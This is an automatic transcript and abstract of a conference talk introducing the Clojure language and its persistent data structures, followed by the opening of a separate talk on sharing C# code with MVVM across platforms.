So here we have a set containing the keyword A and the keyword B. I will mention, and you see it here on the slide, commas are white space. So if you want to, you can go back and add commas into this code. And maybe when you get started, you know, you're initially programming and closure or writing Eden data, you will. And then you realize all the time you can save by never having to type a comma again, and you'll stop doing it, or at least most people do. Now, the funny thing is that I have just taught you the closure programming language. I've taught you the entire syntax because as a list, closure programs are written in data. They're not written in text, and they're consumed as data, not as text. So we take data in Eden, it's actually a superset of Eden, deserialize that into data structures, and that's actually what your program is made of. So here's Hello World. If I interpret Hello World as a piece of data, I see a list containing a symbol, printlin, and a string Hello World. If I interpret it semantically, I say, oh, the first symbol in a list is the name of a function to be invoked. So that is printlin Hello World. Now let's define a function. So here, this is the canonical syntax for defining a function in closure. Def in, define a function, greet the function name, a documentation string, an argument list, in this case a single argument, your name, and then stir, in this case, is taking two arguments and sticking them together and making a string Hello your name. But notice that this has not introduced any new syntax. I could also analyze this purely as data. So this is a list containing a symbol, a symbol, a string, a vector with a symbol in it, and a list with a symbol, a string, and a symbol. It's all made out of data. So it's 9, 14, and 52 seconds. That's how far we are into the talk. You now know closure. So we're just going to take a deep breath for a minute and enjoy the fact that it was so easy to learn the language. So now let's get back to those benefits that I wanted to acquire as a software developer when I'm building systems. I want to be power or knowledgeable. And to be knowledgeable, I actually have to have knowledge. I would submit that C sharp and Java and relational and no SQL systems actually don't have knowledge in them. They have machines in them. And you can go and look at the machine, and then you can come back later and look at the machine and what will have happened. It will have moved. It will have moved into some different position. And persistent data structures are a different approach to that. They are immutable, so they can't change. The only change in the world is by function application. Another way to say this in an object-oriented setting is the only way new stuff happens is via constructors. So as a sort of capsule way to do it. Imagine a world where no objects had setters ever. Everything only had getters, and you only made new things via constructors. That's what we're talking about here. Now, of course, in order to do that, we can't be naive about it. And so we have to have good performance, which means that these persistent data structures actually share structure internally. So I'm not suggesting that if you have a map with 100 items in it, and then you create another map that's exactly like that map, but with one more, we now have 100 more things in memory. Those things can share data together and maintain full fidelity access to old versions. So let's go back and look at the characteristics we get out of making these choices. Sharing transient data structures is difficult. They might change out from under you. Sharing persistent data structures is trivial. If I alias something and 100 people are looking at it, what could possibly go wrong? They can't change. Distribution is not trivial, but it goes from being difficult to easy, particularly when you combine it with something like content addressing. I can take big data structures, and we can share them and refer to them by their hash if we want. And once you know you've got it, you can cache it forever. Concurrent access is also trivial. Everything in Clojure is safe for concurrency and safe for being looked at by multiple observers. The access pattern is your choice. You can consume things in an eager fashion or in a lazy fashion. And obviously, caching is easy because things can just stick around forever. What things look like this today? A lot of functional languages support this, so Clojure, F-Sharp, and on the database side, Datomic, has the entire database as a persistent data structure. Now, having made data this way, we want to have power over our data. In the OO world, we get power over our data by having a proliferation of concrete classes. So I'm going to have the person being and the account being and the order being and the order line item being, that sort of thing. In a functional language, we follow more with Alan Perlis, who said, it's better to have 100 functions that work with one data structure than to have 10 functions that operate on 10 data structures. Or in OO, what do we end up having? Is three or four or five functions on thousands of different data structures. And so every time you sit down to write a program, there's a brand new API that somebody made up. In Clojure, every time you sit down to write a program, there's an existing API, and the API is Vectors, Maps, Lists, and Sets. So let's look at those. We'll start with Vectors. Here's a short program that defines the name V to be a vector containing 42, the keyword rabbit, and a sub-vector 1, 2, 3. I should mention, by the way, here, that everything nests. So all the different data structures you've seen nest inside each other arbitrarily. That's generally not true in programming languages that have a lot more syntax. Go to the top of your C-sharp or Java file and write a for loop around your import statements. And you'll get an idea of the kind of thing that I'm talking about. Because don't nest, there's rules about what you can put where, and you get in trouble, and the compiler will not let you move forward if you don't do that. So now having created an associative data structure, associative data structures act as functions. So instead of saying get from V, the item at the index 1, I just say V1. The first thing in V, and it's the one thing in V, obviously we're zero based, so it's not going to be 42, it'll be rabbit. I can peek at a vector, in which case I will see the thing at the end, 1, 2, 3. I can pop a vector, in which case I will see, and that should be popped off, so that the 1, 2, 3 should be gone. And I can take a sub-vector of a vector, so here give me the vector starting at 1, so 42 falls off the front. All of those things are constant time operations. Now let's take a look at a map. So here's a map with three key value pairs, A1, B2, C3. Again, maps are functions, and so instead of saying get from the map B, you just say map B. Keywords are also functions that look themselves up in collections. So everywhere in an object-oriented language where you'd be saying dot get first name, dot get last name, in an idiomatic closure program you would be saying colon first name in function position, the first slot in that list, and then say that guy's going to be 2. I can get the keys out of a map, so there's ABC, you can also get vowels, that would return 1, 2, 3. I can make new maps, so here's an example of one of those constructors. ASSOCI takes a map and some key value pairs and returns a new map. So here I'm taking the map M, ASSOCIing in D4 and C42. Now C used to be 3, obviously that gets overwritten. Although we should be careful about the use of the word overwritten. What happened to M when I did that? Absolutely nothing. I returned a new object that had those characteristics. M is still as it was, and I can dissociate keys from a map. So dissociate D from M. And then you can get to some more advanced ones. So merge with is a function that takes a function. So this is a higher order function when people talk about functional programming doing higher order functions. This says combine M with A2 and B3, but instead of overwriting values where they collide, combine them using the combining function passed into merge with. So in this case merge with is being the pasta plus sign. So it says oh I see, A used to be 1, but I passed in A2. I combine those, 1 plus 2 is 3. And you can go further with dealing with say nested structures. So let's imagine I have a nested structure. John Doe has a name, but John Doe has an address, and the address is actually nested further. The address has a zip code in it. There's a function called get in that will take a data structure and a list of keys and walk the path of keys down to what you're looking for. So that says walk the path of keys from address to zip, so that's going to return 27705. You can also use this to update data structures. So assoc in is the recursive generalization of assoc. It says take this data structure, drill down into it somewhere, and then make a change at that place. So now I've changed the zip code to 27514. And perhaps even the more interesting one is update in. Update in takes a data structure and a path and a function. And it applies that function to whatever finds in the path. So here I can say go to JDoes, address zip, and increment it. So it would go from 27705 to 27706. In a certain sense this is trivial. In fact, it is trivial. On the flip side, if you built an OO program, there would be a special class that represented the person and a special class that would represent the address. And then it would just be busy work to navigate through it because there wouldn't be a generic access path like this. So let's look at sets. Closure has some extensions for set in the set namespace. So that loads an additional namespace. You don't need this for the literals, but you need it for some of the functions. I'm going to define the colors to be red, green, and blue, and the moods to be happy and blue. I can disjoint from a set. So if I disjoint red from red, green, and blue, I'll get back green and blue. I can take the difference between two sets. So the difference of colors and moods subtracts out the stuff in moods. So I subtract out blue and then up with green and red. I can take the intersection of colors and moods. And I can take the union of colors and moods. Not shown here, but I leave it for you to go play with. How many people feel like they have a grasp of the relational algebra that underpins SQL? Anyone been there, done that? So closure.set the namespace implements the entire relational algebra on Closure's data structures. So you can just go in there and party on and project and join and whatever you want to do. So that's generic data structures. I want to feel powerful. And this is pretty darn easy to summarize. The way I want to feel powerful is I want to have bare metal access to my platform. A lot of people mistakenly divide the world into two kinds of languages. Languages that are at the metal platform languages that are more than highly expressive, friendly, or to the program languages. That's a false dichotomy. I want both, please. And so closure provides direct access to the platform. You can construct things on the platform. Most platforms, it's going to be new class name, some argument. In closure, it's always the verb first. One of the things about closure is all action in the world always comes in the first position of a list. So when you get ready to start metaprogramming, it's a beautiful thing. Everything works the same way. So making a new thing, you see the class name and function position. That says make a new red widget. Static members, math.py on the platform would become math slash pi. Instance methods, rand.nextint would become.nextint on rand. Notice again, perfect consistency across the language. Verb always comes first. Grabbing an instance field would be pixels.data on the platform and would be.data pixels on closure. You're not going to see this one very often because even though I wish they would, idiomatically Java and C-sharp programmers don't encourage you to access the fields of their classes. They tend to make them private. The place where you will see that syntax quite a bit is if you're writing a closure program that's targeting JavaScript. Because in JavaScript, people do that all the time. Yes. So there are three platforms, I think, that are super important. And they are Java, the CLR, and JavaScript. There could be others, but those are the three big important ones. When I say bare metal, I mean access to the platform. I mean specifically, if I'm writing a Java project, I don't want to have to drop to Java to do some high performance thing. Now, I am not talking about dropping underneath garbage collection. So I'm not talking about dropping to J&I or whatever the platform access called in C-sharp, I can't remember. Yeah, PNVoc. I'm not talking about dropping to that level. And I'm not talking about competing with the C guys for their bare metal. So I'm not going there. I am talking about platforms that are garbage collected in virtual machine platforms. So chaining access on the platform, it's x.y.z. Enclosure, it's.. at the beginning. And then that says, that's the recursive generalization of do something, right? So person.getaddress.getzipcode. You don't have to write the. again and again. I will point out that a lot of people, when they first look at Lisp, they make this snide joke on Twitter about punctuation. But if you go back and look through these slides, closure has fewer parentheses than the same code in C-sharp or Java would. And furthermore, it has no commas. And let me tell you, I have been writing code in an Algal syntax language for the last week, and it is murder to have to type commas. I feel for people who have to type commas when they're writing code. You can implement interfaces in closure with a form called reify. So this says reify runnable and implement the run method to print hello. And I have one example just to demonstrate my point about platform power. It's actually a JavaScript example. And you can go and read this article. Some of you may have seen David Nolan. He's here speaking at the conference. He's the lead developer on ClojureScript. And he has been doing benchmarking to verify that ClojureScript can do anything that JavaScript can do, so that there's no need to drop down to JavaScript. And so he put together this demo, which I will attempt to open. So this is a port of Notch's JavaScript performance demo. So this is a purely calculative exercise. This is a processor burning thing. It's doing a Minecraft simulation internally. And David has been verifying that ClojureScript is neck and neck with JavaScript at this. And this is even doing things like icky, mutable, imperative, at the bottom of the rendering level, loop stuff. So I would encourage you to check this out if you're skeptical about claims of platform performance. You could do similar experiments with Clojure running on the CLR or Java. Oh, and you know what? I need to turn that off because it literally will burn one core. So my machine would start to sound like a fan. Its job is to use a core as fast as it can. So I would summarize the Platform Interop story in Clojure as simple, wrapper-free. And this is a big deal. The minute you have wrappers talking to Java or CLR or whatever, then you're no longer in the world of getting the direct stuff. You're now in the world of having a value-added service, which becomes a value-subtracted service when you want to do something different. It's performant and it's conformant. It gives you access to the features of the platform. So I'm feeling pretty knowledgeable and powerful. I want to talk now about feeling flexible. And so a big piece of feeling flexible in a language like Clojure is that the work style is interactive. There's this website. You can go check it out called Tri-Clojure. Tri-Clojure runs a Clojure REPL in the browser. And you can go and just start programming. There's also a website called Himera. Himera is a Clojure script REPL running in the browser. Now, because we have only an hour today, I'm not going to do an extended demo of what it's like developing at the REPL, but I want to talk about it. I had dinner last night with Neil Ford, who will be speaking later today. And I was asking him, he's at ThoughtWorks. I said, how do people develop code in the agile world these days? What's the pattern? How do I move quickly? And he said, I think that it's primarily, it's not necessarily test-driven, but it's keeping the test green. It's having a fast feedback loop and you code and you see the test pass and you code and you see the test pass. That's the people who are working the fastest how they work. I don't work like that. The way I work, I would describe as literate planning. I'm people familiar with Nooth's literate programming, the idea that your program would be a document. There are a bunch of people in the Clojure community who are into that. I'm not going to say that I'm that far, but I do most of my work as a programmer, either in a drawing tool, an OmniGraphil, or in an outlining tool. And inside the outlining tool, I have snippets of code that I send to the REPL for evaluation and gradually build up larger and larger programs. I tend not to write unit tests almost ever, because by the time I've done exploring at the REPL, I've produced a pure function, which I've seen to work on a variety of inputs. Instead, I write generative and simulation tests, which are at a higher level. So generative tests will manufacture inputs of different kinds for functions and then verify assertions about those functions. And then simulation tests, really, I think that B's needs in testing, is having a database of activity simulating real-world activity against your system and running it that way. If you're interested in that, I am giving a talk on simulation testing. I think not in the next slot, but the slot after that this morning. But the point I want to make here is that this interactive style of development is incredibly rapid, and it's quite a bit different from IDE-driven development or test-driven development. In addition to that interactivity and being able to build a system quickly, I want to work in a dynamic language. So Clojure is a dynamically typed language. You notice that we had a bunch of data structures up there, but there weren't any classes or types or any of that stuff. And I want to show you what this feels like by refactoring a piece of common Java code into Clojure. So this method is from a library called the Apache Commons. If you have been in the Java community for more than five minutes, Maven, while it was downloading the Internet onto your machine, certainly downloaded the Apache Commons, because it's used, it's a utility library that does common things that Java doesn't ship with. And so this particular, you can try to read it, this particular function is a validator function that verifies that a string is blank. And the way that a string is blank is, well, if it's null, it's blank, and if it's linked to zero, it's blank. And then the complicated part, if it's got stuff in it, but all of that stuff is white space, then it's blank. So I'm going to take this idiomatic Java code, and I'm going to refactor it to idiomatic Clojure code. So I'm going to remove the type declarations, and this is what people think about when they're coming from a statically typed language to a dynamically typed language. They picture the code that they had with all the types removed, right? And I agree with you that that would be a catastrophe, right? If I stopped here, we would be in a bad place, because basically what I just said is you live in a tar pit with good maps, and now you live in a tar pit with no maps. So we've gotten rid of the maps, now let's get rid of the tar pit part. So I'm going to get rid of the class, because we're just going to make a function, and I'm going to introduce a higher order function. So we don't have a higher order function syntax in Java, I'm just going to make this up. So I'm going to say every ch and stir character is white space, and you can sort of imagine what that does, right? That's an expression that returns true if it's true for every guy in the collection. Now, one of the great things about this higher order functional style of programming is once you've written it that way, all those corner cases around it actually disappear. So now I have is blank of a stir is if every character in stir is white space. And then I'll actually drop down to closure syntax. Now, if you compare this with the strongly statically typed slide at the very beginning, this is the kind of advantage that I'm talking about of writing code in a dynamic language. And you end up with a very, very small number of very short, very general purpose things. And these pieces all have to fit together, because if everything wasn't shorter, that would suck, because I would still want to have the roadmaps that static typing gives me. I wouldn't want to go here. And if I had to make as many things as I would have to make to build an OO system, I'd still want the types. But I make 10 times fewer things on small closure programs, and 100 times fewer things on large closure programs than I would make if I had to write them in OO. I absolutely would. So the question was, would you say that it makes a difference which static language you're using? Yes, I think that the reasons that dynamic is better become much more subtle and nuanced when you compare it to something like ML. And I would be perfectly happy. And this is a point I should have made on the static versus dynamic panel earlier in the week. I think we should all get into functional, and then we can argue about the static and dynamic thing, you know, once we're at the end of the road. Because I consider that static dynamic debate is really kind of tiny compared to we need to be more functional and less imperative. And so I think that closure and F-sharp and Scala and ML and OCaml and all these guys, we should all, we're all on the same side here, right? We are all fighting for truth and justice together. So, intelligent. What makes systems intelligent? One thing that makes systems intelligent is being able to specify, do what I want or do what I mean, not how do you do this. And one aspect of that is being declarative. I'm going to give one example of a declarative DSL enclosure that's called destructuring. And the idea behind destructuring is I want to have a way to bind multiple names. I already showed you how to bind one name, right? DefX or letX, right? But I want to be able to bind multiple names, and I want to work against the abstract structure of what I'm working on. So I don't want this to commit me to concrete types. It's, again, another dynamic argument. And I want this to be available everywhere. So anywhere in the language where I would bind names, I want to be able to do this. And there's going to be two forms of it. I'm going to have a vector form, which is going to do sequential destructuring. And I'm going to have a map form that does associative destructure. This is probably the hardest really early roadblock for people in closure unless it's motivated. So I'm going to show an example whose intention is to motivate it. Let's imagine that I was writing a function to make the Fibonacci numbers. In order to make the Fibonacci numbers, I need to maintain two items of state, right? Because every Fibonacci number is built from what? The previous two. So I have to do something pair-wise and then maybe trim that down to actually see the Fibonacci's. So I've written this function next Fib pair, which takes a pair of numbers, and then it makes the second number, the first number of the new pair, and it makes the sum of the two numbers the second number of the new pair. And the problem with this, and then I iterate over it, by the way, iterate is a higher order function that produces an infinite collection. So iterate says take that seed and then do the recursive generalization of whatever the function is. So take 0, 1, call Nick's Fib pair on that, and then on the result, and then on the result, and then on the result, and then on the result. So that produces a sequence from which I can then extract the Fibonacci numbers. But the thing I don't like about this is that there's a lot of noise for picking apart the pair. And so what closure lets me do is you can add this extra pair of square brackets anywhere where you're binding names, like in a function definition, and that extra pair of square brackets says, I don't want to bind a name to the thing that I was given. I want to destructure it. I want to break into it, and I want to bind A to the first piece of it, and B to the second piece of it. And the thing about these kinds of syntactic improvements is they snowball, right? Because that next Fib pair function is so short and so beautiful now, I'm not going to bother to give it a name, right? I'm going to drop it down to where I'm actually doing the job. And that's the kind of thing that allows you to make categorical improvements in the readability of your code. Because now you can say, now you have control of locality, where I had things that were apart, I've now brought them together. I'm not saying you should bring everything together. I'm not suggesting one giant do all function. But I am saying that having the ability to choose where to bring things together allows you to write expressive code. Associative destructuring works the same way. We bind names by keyword lookup. I'm not going to look at this. Let's get past this. The only other example of a little bit of declarative programming that I want to show you, this is another little DSL that's in closure, is solving the actual problem of Lisp for beginners. The actual problem with Lisp is not parentheses. I already showed you that there are less parentheses in idiomatic Lisp than there are in idiomatic Java or C-sharp. The problem is things look inside out. And I'll show you how that starts to happen. So here I have a map. Jonathan's password is secret. And now I want to associate something new onto it. So notice a social appears outside it and the nickname John appears on the other side. So I'm building up on the left and right of the thing I started with. I'm building out. And then I decide to dissociate off the password because I don't want anybody to see that. And now you start to see this thing that builds up inside out. And most programmers, most humans, don't like to read things inside out. How do they like to read things? Left to right. So Clojure has a macro called thread first that reorders programs from inside out to left to right. There's another macro that reorders things from inside out based on the last argument instead of the first argument. So there's actually two flavors of this. But the point is, I guess there's a couple of points. One is, it's one thing to say I don't like inside out reading, but I want to have a language where I can decide what order I do things in. So in Clojure, I could choose to go left to right. I could choose to go inside out. I could be perverse and implement my own macro that made you read things right to left or top to bottom. Or bottom to top. That seems a little crazy. But the thing about this that's important other than just doing it is that these capabilities are built in Clojure. So this is extending the language itself by making these changes. So these DSLs are what you'd call internal DSLs, right? You can do this right in the language. A second thing that's going to make me feel functional is having a powerful set of persistent data structures. We've already talked about this. But I skipped one on purpose. I said we're going to look at maps, vectors, sets and lists, but we didn't actually. Do you remember which one we skipped? I showed you API for three of the four. A lot of stuff coming really fast. So the one we skipped is lists. I didn't show you any functions for manipulating lists. And the reason that I didn't is that in Clojure, you don't actually think about manipulating lists. You think about sequences as an abstraction over any kind of collection. And so the sequence library, although the syntax of the things that are going to be returned, they're going to print with parentheses around them, so you're going to go, oh, that's lists. They're actually not. Sequence is an abstraction over any collection. So sequence is built at the bottom on first, rest and cons. First returns the first item in a collection. Notice that I'm not using it with a list, though, to my point. First is working here with a vector. Rest returns the rest. And cons sticks something on the front. Take and drop are recursive generalizations. So take2 gives me the first two things. Drop2 gives me everything else after I skip past the first two things. I can apply predicates and higher order functions. So I've got every, not every, not any and some for picking apart collections. And my collections can be lazy or infinite. So you already saw making the Fibonacci's. Here you have the whole numbers. Ink zero makes the whole numbers. Cycle12 returns me an infinite collection of 12, 12, 12. RepeatD returns an infinite collection of Ds. I don't actually have infinite business data, but it is nice to be able to treat things. I mean, where do you think infinite? Actually think streaming through data larger than memory. I have a big data job and I want to stream through it. This is really powerful. And of course, map, filter and reduce. So here we have another API, range, which gives me a range up to a number. So range10 is zero through nine. And then I'm showing you map, filter and reduce here. So filter subtracts out of a sequential thing, stuff that or actually keeps in a sequential thing, things that match a predicate. So keep out of this sequence all the odd things. Map, sometimes called collect or select, depending on your language, says pluck. Call this function on every item in the collection to give me the results and then reduce walks a collection with an accumulator. And so I'm just reducing plus. Now, the big thing here is not that I work with lists this way. The big thing here is that I work with everything this way. So CECs work with collections. They work with directories on the file system. They work with the contents of files. They work with XML data. They work with JSON data. They work with results that's coming out of a database. Just to give a slightly larger example, I downloaded the Rotten Tomatoes API yesterday in the hotel room and I asked myself the question, if you look at the movies that are currently topping the charts, what actors are in more than one? So here's how I'd go about doing that. I'd find the JSON API, I'd download it, I'd parse the JSON, I'd walk the movies, I'd accumulate up all the cast members. I would extract their name because the data structure has in it more than names and I just asked about names. I didn't get the frequencies. So if I've encountered an actor more than once, I want to have a number that says, oh, I encountered that guy twice or ten times or whatever. And then I'll sort by the highest frequency. So there's my pseudocode. It's eight lines. There's the actual code. So go to the box office, you're slurp it down, read the JSON, grab the movies out of it, map cat the abridged cast into a collection, map the name out of that collection, grab the frequencies, and sort by the negative of the second entry in the frequencies table, which is going to sort them from highest to lowest. Notice that I also naturally, as a closure programmer, generalize the question. I'm always going to generalize the question and return an infinite sequence, a potentially infinite sequence, because the consumer can then just take the part that they want. Right? They can just go and grab the little bit that they want. And if you're curious, as of yesterday, nobody was in more than two movies that were in the top 50 from the API, but there were a bunch of people that were in two. Yes? So this is a question that comes up commonly, particularly in a statically typed scenario. So I broke the presentation of the API into two pieces, specifically to try to cover this, and I'll be explicit about it here. All of the collection types have APIs that are about them and return them. So map APIs that return maps, vector APIs that return vectors, set APIs that return sets, and then the sequence abstraction takes you into a different world and says, I want to process this sequentially. So you can do either or. You just have to know which one you're doing. So how do you make a map if you have a vector, for example? So there is an eager map called map V. So map V is, and we don't care about the concrete type. It's not how we roll, right? We care about the semantics. And so map is lazy and map V is eager. But so if you wanted to do, you do want eagerness, though. That's right. And so map V will take you to that data structure. So there are paths to what you want, but they're not the most common and enigmatic thing. But it's not forbidden. You'll want it less once you do this for a while, though. So I also want to feel logical. And I'm not going to go through these examples in any detail, but the point that I want to make is that Closure has been a community that is incredibly friendly to adding logic programming. And so logic programming is not, I'm going to go over and invest in a prologue system, right? It's something that just happens naturally inside of a closure programming. There are at least three fairly well-established libraries for doing logic programming in Closure, Cascalog, CoreLogic, and DatomicDatalog. Cascalog, this looks like a query. This says, walk the people data set, pulling out name and age where age is greater than 40, and then walk the people data set, pulling out name and age where age is greater than 50. As an example of two different queries, this is not super interesting. I just copied it off the website. But the actual thing about this is cool, is that this is backed by Hadoop. So this is an extremely powerful small set of lines of code. This says run a parallel query on data sets that could be spread across tens or hundreds of machines and give me back the results. CoreLogic is, this is the classic monkey needs to move a box to the middle of the room problem implemented in CoreLogic. I would encourage you to go download CoreLogic and take a look at it. The work on CoreLogic has been so appreciated in the logic community that the closure community and the scheme community are starting to have a little love in. And the scheme conference next year is actually going to be co-located with the closure conference. And it's been super exciting to have really high powered academic schemers and particularly reasoned schemers, people who are doing logic programming and scheme, sharing ideas and sharing concepts with the closure community. And then here's Datalog in Datomic. So this is the equivalent of SQL, kind of in our world. You can think of expensive chocolate and related product as views. And when you see variables repeated in a query, that causes a join. The thing I like about Datomic Datalog, and I have a personal interest because I helped build it, is that it is just beautiful to read, to do big jobs compared to SQL, right? There's no joining through tables and getting caught in the structure of the join tables and all that sort of muck that you have to do. And all of this stuff is not leaving the language, right? This is not an alternate world that has to be magically brought into the language. This is just people building libraries in the language. Finally, I want to be effective. And I mean the word effective here in the literal sense. I want a program that has effects. This is where functional programming sometimes runs aground. I mentioned before that one of the things people do in functional programming is they sort of wave their hands at this part of it and say, well, you know, you're in Scala, you can say, well, you use functional where it makes sense, and when you need to have an effect, do you have an effect? You do something different. You can take the high road with types and take a monadic approach to effect. Or you can do what closure does, which is to get away from these in place effects by substituting value transitions. So here's where we are today, right? Every little bit of our program is a machine and putting together programs is like assembling things, all of which are moving. So it's no wonder that it's hard to do, right? Composing programs is really difficult because everything is a bunch of moving parts that you're trying to stick together. And this made sense when memory was at 1970s prices. In closure, new memories always use new places. Memory is not that cheap anymore, and we can let garbage collection forget whichever old memories we don't care about. So change is encapsulated by constructors, references refer to a point in time value, and references only see a succession of values. So here we have three values, v1, v2, and v3. We have constructor functions that know how to make values, that maybe take an old value and give you a new one. And then we have atomic succession from one value to another. And then a view of this across time, once upon a time the New York Yankees had this roster, and then somebody got fired and they had that roster, and then two people got hired and they had that roster. Those values are protected by this reference, and observers who are outside that can perceive the identity and remember it and record it, and they can use it in a concurrently safe way. And this is the big one, observers do not have to coordinate. So observers of references or values don't have to coordinate with each other. And people look at this for the first time and go, aren't these just variables? No. They're not just variables. They represent understood semantics of transitions from value to value. If you've ever had to write a lock, then you're doing something different than what we're talking about here. These things do not have to be protected. Here's what it looks like from the API level. I have a reference constructor. In this case, I'm using one called Adam. That makes a reference around the value zero. And then I'm going to take a pure function to do something to the contents of that and some args. And then I have an atomic succession function. So swap says, send a function inside this box, apply the function inside the box, give me back the result. So what will be inside of the Adam after this? It was zero, now it will be 10. And here's mapping that back to the picture. So I have a reference. That reference points to an initial value. I apply a function. We have an atomic succession of the reference, and then it's at a new value. I can do the same thing with, this model is completely general. I can do the same thing with bigger structures. So now the Adam has in it different data. It's actually the equivalent of a Java bean or something. I'm creating a person, and I'm swapping, associating in a different name for that person. I can also have varying semantics. So now instead of having Adam, I have a different kind of ref called a promise, and a different kind of succession function called deliver. So there's not a single semantic for concurrency. There are five or six or seven, depending on how you count them, and they are all safe. This model also scales all the way up to an entire database. So here, I have, this is not closure anymore. This is datomic, which is built in closure. And I'm connecting to a database and transacting against it. Transact is a succession function, just like all of those other succession functions. It's acid, and you start with a value of the database, you get back a new value of the database. In fact, the return value from a transaction is a future. So you can decide whether you want to wait on the return value or not. And inside that future, you have the old value of the database and the new value of the database. It is this atomic succession model writ large. Now, the obvious question, and this came up on the panel, really, you give me back the entire value of the database? What happens if the database is big? What happens if the database is ginormous? And the answer is that these databases are values. So I don't have to give you back, I can evaluate the database lazy. I don't have to give you back the entire database. What can I give you? I can give you the promise that I still know how to get all the rest of it. And then I can fetch the other pieces as needed. So you can grab these slides after. There's a breakdown reference of the various other reference types, but we're not going to look at them today. The last thing I want is for my software to be pervasive. I don't want to have a private island runtime that I have to go and convince managers to install. I want my systems to run on the platforms that people use. And I think those platforms for language like Clojure are the JVM, JavaScript, and.NET. Clojure was originally written for the JVM, that is the most mature implementation, that's where the most work has gone forth. Clojure CLR came next, but Clojure Script has already passed it probably, if not in maturity, at least in widespread use. And the problem, unfortunately, is, and you know this as well as I do, most of you in this room, that languages on the CLR languish until and unless they're blessed by Visual Studio. So I think that Clojure is backwatered on the CLR because there's a strong commitment to using those tools, and the tools are not available. And I would say it would be great if some of you would take it out for a spin and help make Clojure on the CLR more mature and take it in the direction of use that it has seen on Java. So in conclusion, everybody in the industry almost builds things out of transient data structures that don't compose. This includes Java, C-sharp, relational databases, and no SQL. Clojure solves this with persistence and succession of values. Persistence gives us systems that are composable because the parts don't move around while you're not looking. Value succession gives us a way to actually model state that makes sense in that world. There are other choices. You can go down the Monad Road, for example, if you want. These better semantics allow us to write more powerful and more flexible programs, and those semantics are available on real-world platforms where you want to build and run software. I've included at the end of the slides links to a bunch of references. One of these references, and you can easily Google for this. If you Google for Stuart Halloway presentations, I actually have a wiki that's got slides from all the presentations that I do, and I have left, I believe, four minutes for questions. Yes? You mentioned using an outside tool to use the application of the application. Do you have to use a real-world? Yes, so the question is, what is my outlining tool? Yes, I use org mode and snippets. I totally get that that's not where the world is going to go, and I don't want to be an Emacs user. I'm just forced there by its compelling features. But I understand that, you know, telling someone to use Emacs, if you're not already an Emacs user, did you just tell me to F myself? Right? Because it's a hard learning curve. There's IDE support for closure in all of the mainstream Java IDEs, and it has characteristics that are more familiar and friendly to developers that don't matter very much to me, and what it's missing is general text editing capability, speed, and in particular, a structural editing mode called par edit. So if you've never worked in a language that had a structural editing mode, I would encourage you to do a Google search for par edit, P-A-R-E-D-I-T. That's the big reason that most closure users stick with Emacs once they get hooked on it. Other questions? Those of you who are going to be watching this on camera, I'm in a brightly sunlit room, shading my eyes so I can see people. Yes? So the question is, is it possible, given that the data structures evolve by creating new immutable data structures, can you get back to the old ones? The answer is you could if you wanted to, and it depends. So closure does not, by default, keep the last ten versions of a ref and let you go back to them, but the ref semantics, the model of refs, you could write a ref that had those semantics if it made sense to do in your program. Also, obviously, if you hold on to a value, if you go back and look at my picture of the observers, some of them are looking at old value, as long as you're still looking at it, you're still looking at it. Now, on the durable side of persistent data structures, when you go to Datomic, that works a little bit differently because in Datomic, everything is time-stamped and nothing is ever thrown away in that sense. So in Datomic, you can actually put a filter on the database that shears off data from some time range. So you can say dot as of a month ago, teleport your database back in time a month and query against it there. That's the kind, and it's a great example of the kind of thing that's theoretically made possible by this. Not all the reference types deliver that capability, but it's possible. One last question. Okay. Right, so how does this data structure copying thing work efficiently? So if you imagine a linked list, if I have a linked list with four guys on it and you stick a guy on the front, I don't know you did that, and that's called shared structure. This guy's talking to that guy and nobody cares. The data structures in Datomic are all listed in sideways. They're all trees, and they have the same property. So you have an associative data structure over here that's represented as a tree. You make a change to one thing. You get a new tree that's pointing willy-nilly all into the old tree to reach all the old stuff except the one. So the cost you pay is what's called a path copy, and in closure, the paths go five deep. So it's actually, and they are, it's log 32 in instead of constant time, but given that it only goes five deep, it falls out in the wash. In Datomic, on the durable side, those trees are three deep. So they're incredibly wide branching trees, so you don't pay a big penalty for that. That is slower. Those data structure updates are slower than a purely mutable data structure. So on the flip side, you get the speed back on reads, right, because you don't have to coordinate, you don't have to lock. And so if you live in a world where there will be more multi-core processors in the future, closure will become better and betterer. And if you live in a world where multi-core processors are going to be defunct, then the stuff I'm talking about is ridiculous and you should ignore me. So my name is Stuart Halloway. Make sure you remember to fill out eval cards. I have discount coupons for this O'Reilly closure training video and closure stickers. If anybody didn't get those, come and see me after the talk. Thank you very much.
|
Clojure is a powerful dynamic language that compiles to many target environments, including the JVM, JavaScript, and the CLR. In this talk, you will learn how to think in Clojure, and why you should want to. Clojure encourages functional style with persistent data structures, a rich library of pure functions, and powerful processing support via the seq and reducer abstractions. Clojure implements a reference model for state, where references represent atomic successions of values, and change is encapsulated by value and reference constructors. This reference model is more substantive and suitable to application development than individual techniques such as Software Transactional Memory (STM) or actors. The most important single principle behind Clojure is simplicity. Clojure's abstractions are simple and orthogonal. A la carte polymorphism, careful support for names and namespaces, the reference succession model, and a wide selection of small, composable protocols make Clojure programming swift, surgical and accurate. Clojure's expressiveness does not mean that you have to compromise on power. It is an explicit design goal of Clojure to provide access to the power of the underlying platform, and for programmers never to have to "drop down" to the platform level for performance-sensitive work.
|
10.5446/51517 (DOI)
|
Good morning. I think we're ready to go. So let's kick into this. This morning's session, I hope you're all in the right one, is about sharing C-Sharp and it's about using NVVM to do that. We're going to look at all of the modern platforms. So we're going to look at all the Windows platforms and we're also going to look at Android and iOS and we're going to look at C-Sharp across them. There are other modern platforms. There's obviously the Xbox coming along, the Xbox One. And there is also the new modern platforms like, you know, PlayStation 4 is coming along, PlayStation Vita, Google to us. All of these are coming along and all of these will be home for C-Sharp. So what we put in the abstract about what we talk about is all of this. But I know that, actually can I just ask, who here already knows about NVVM and does NVVM kind of a... Okay, so it's pretty much the majority of you. So particularly after all the great sessions that were yesterday from Laurent and Gil and from Rocky today before about NVVM, I'm going to not go too deep into the NVVM introductions. But also with the sessions that are coming up from Craig, I'm not going to go so deep into the introductions into Xamarin iOS and Xamarin Android because you've got plenty of opportunities to do those later. But what I'm going to try and concentrate today is really on the core of what I can bring benefit, I hope, to you guys with, which is NVVM on the modern platforms. And it's about how you can extend portable classes to bring native features. So in particular, I hope you get to leave here today with kind of a good understanding about how you can use NVVM across all the platforms. So what I'd like to do is I'd like to spend the next hour, I'd like to spend the next hour telling a story. And this story is going to start in a very good way. It's like a classic story. And it's going to start a long time ago, actually November in 2011, in a galaxy far, far away called London. And it starts with a project called Social Storm. And it was for the Connect Star Wars game. The idea was to bring an app together that would bring together streams from Facebook, from Twitter, and from Xbox. And 